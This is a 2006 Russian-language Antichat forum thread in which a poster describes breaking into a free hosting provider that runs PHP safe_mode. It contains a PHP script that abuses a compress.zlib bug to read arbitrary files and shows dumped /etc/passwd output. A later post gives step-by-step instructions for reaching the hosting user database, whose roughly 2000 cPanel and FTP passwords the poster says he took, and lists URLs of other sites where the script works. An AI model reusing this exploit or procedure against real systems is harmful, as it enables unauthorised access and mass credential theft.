HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ИНФО > Статьи > Авторские статьи
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Взлом бесплатного хостинга c safe_mode = On
  #1  
Старый 13.05.2006, 13:31
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332

Репутация: 1276


Post Взлом бесплатного хостинга c safe_mode = On

Большинство бесплатных хостингов предоставляет свои услуги с safe_mode = On.
Характеристики хостинга Apache/1.3.34 (Unix) PHP/5.1.2 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.25 OpenSSL/0.9.7e PHP-CGI/0.1b, предоставляет веб-хостинг, файло обменик, e-mail.
Проведенное время в поисках уязвимостей на главном сайте хостинга дала только пассивную sql инкцию которая брала из базы имя рисунка, из-за этой ошибки удалось найти реальный путь к расположению файлов.
Не один shell не смог справится с safe_mode не r57 ver.3.5 и не с99 ver.1.0. Прошло еще некоторое время в поисках решения, и наконец мне удалось читать любые файлы на сервере, благодаря ошибки библиотеки php compress.zlib.

PHP код:
<?php
$file
=""
$tem=""
$temp=tempnam($tem"cx");
    if(
copy("compres.zlib://".$file$temp))
        {
            
$otrit fopen($temp"r");
            
$pokaz fread($otritfilesize($temp));
            
fclose($otrit);
            echo 
htmlspecialchars($pokaz);
            
unlink($temp);
        }
?>
File.php?file=/etc/passwd

# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
freehost:*:1006:1007:User &:/host/freehost:/usr/local/cpanel/bin/noshell

Все пароли к cpanel и ftp лежали в sql базе, сделав бэкап базы у была базы 2000 пользователей.
Я пробовал проделать тоже самое на других хостингах (зарубежных), но получал только печальный ответ «НЕ ДОСТУПА». На некоторых российских хостингах выходит. То ли АДМИНЫ у нас такие, то ли мне просто повезло.

Последний раз редактировалось Mobile; 06.06.2006 в 12:50..
 

  #2  
Старый 13.05.2006, 14:58
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


По умолчанию

Цитата:
но на этом хостинге лежит мой сайт!
дык смени пасс =))
 

  #3  
Старый 13.05.2006, 16:04
dinar_007
Флудер
Регистрация: 18.01.2005
Сообщений: 2,298
Провел на форуме:
13936387

Репутация: 1844


По умолчанию

Статья интересная, но было-бы более интересно её читать, если-бы в ней ошибок меньше было...
 

  #4  
Старый 13.05.2006, 21:26
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

Так-с, ладно.
Цитата:
Все пароли к cpanel и ftp лежали в sql базе
Объяснил бы где ты надбывал логин и пасс для sql...прочтя /etc/passwd =))))))
 

  #5  
Старый 13.05.2006, 23:00
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию

да, всё конечно хорошо, но...
надо хотя бы соблюдать копирайты, а то выглядит так, что эту уязвимость нашёл ты...

_http://securityreason.com/achievement_exploitalert/8
 

  #6  
Старый 13.05.2006, 23:11
Mobile
Регистрация: 18.02.2006
Сообщений: 1,090
Провел на форуме:
6489333

Репутация: 1564


По умолчанию

Цитата:
Сообщение от VectorG  
да, всё конечно хорошо, но...
надо хотя бы соблюдать копирайты, а то выглядит так, что эту уязвимость нашёл ты...

_http://securityreason.com/achievement_exploitalert/8
какая разница кто нашёл уязвимость, главное что эту статью написал он
а по той ссылке что ты дал лежит только код...
 

  #7  
Старый 14.05.2006, 17:54
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332

Репутация: 1276


По умолчанию

Отвечу на вопросы:

1)«Надо хотя бы соблюдать копирайты, а то выглядит так, что эту уязвимость нашёл ты...»
- А я в статье утверждал что нашел уязвимость в php compress.zlib именно Я, я думаю когда пишутся подобные статьи, Вы не указываете кто нашел уязвимость в phpBB или IPB и т.д. Подобные уязвимости можно найти на forum.antichat.ru, или google.com и т.д.

2) «Объяснил бы где ты надбывал логин и пасс для sql...прочтя /etc/passwd =))))))»
- Расскажу все по стадия, что я делал:

а) Сначала я исследовал главный сайт хостинга. Т.к на нам находится файлобменик, при загрузки файла он выдает адрес для скачивания пр. host.ru/file/?457894, проверки удалось выяснить что, не фильтруются данные, и сообщение об ошибке выдало реальный путь с лежащим файлам главного сайта пр. /host/freehost/public_html/index/file/index.php
б) Создав сайт на хостинге, как было сказано выше скрипта с _hxxp://securityreason.com/achievement_exploitalert/8, я проверил читает ли он /etc/passwd, и алилуя читает.
в) Затем я вставил адрес который мне выдал скрипт. Нашел файл конфигурации mysql.
г) Затем залили на свой сайт phpmyadmin, записав конфигурации для подключении, у меня был доступ к базе пользователей с паролями.

Конечно это заняло не мало времени, сначала скрипт не хотел выполнятся из-за того, что было запрещено использовать папку /var/tmp. Затем я немного попарился с mysql, не как не получалось соединиться с базой. А еще кто изменил пароль в cpanel, пароли не подходят!

Вот несколько примеров

_hxxp://www.alexxxx.biz/hpmaker/qq.php?file=/etc/passwd
_hxxp //sync.ua/form/cnk-conf/qq.php?file=/etc/passwd


Только маленький облом, он может прочитать /etc/passwd, но на другие папки нет доступа.

Да еще может кто подскажет, после того как меняешь пароль в cpanel v.10, куда записывается пароль, а то он не попадает в тут sql, которую я скачал.

Да еще наверное надо написать _hxxp://rst.void.ru чтобы включили в r57shell эту ошибку!

Последний раз редактировалось DIAgen; 15.05.2006 в 18:07..
 

  #8  
Старый 15.05.2006, 17:50
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332

Репутация: 1276


По умолчанию

Уважаемы члены Members of Antichat, разобравшись с этой ошибкой (оказалось очень серьезной), я решил что выкладывать на всеобщее обозрение исходных моих трудов будет серьезной ошибкой, так как может повести много проблем. Из-за этого я решил что бы кто-нибудь из Вас опубликовал эту статью только в закрытой части форума. Я думаю, что Вы поймете почему. Пишите в личку.

Последний раз редактировалось DIAgen; 15.05.2006 в 18:06..
 

  #9  
Старый 15.05.2006, 17:57
limpompo
Познавший АНТИЧАТ
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию

Если бы ещё через пост это всё пускать то вообще куль!
 

  #10  
Старый 15.05.2006, 21:39
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332

Репутация: 1276


По умолчанию

Молчание знак согласия, значит можно выкладывать статью на общяк!!!!
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.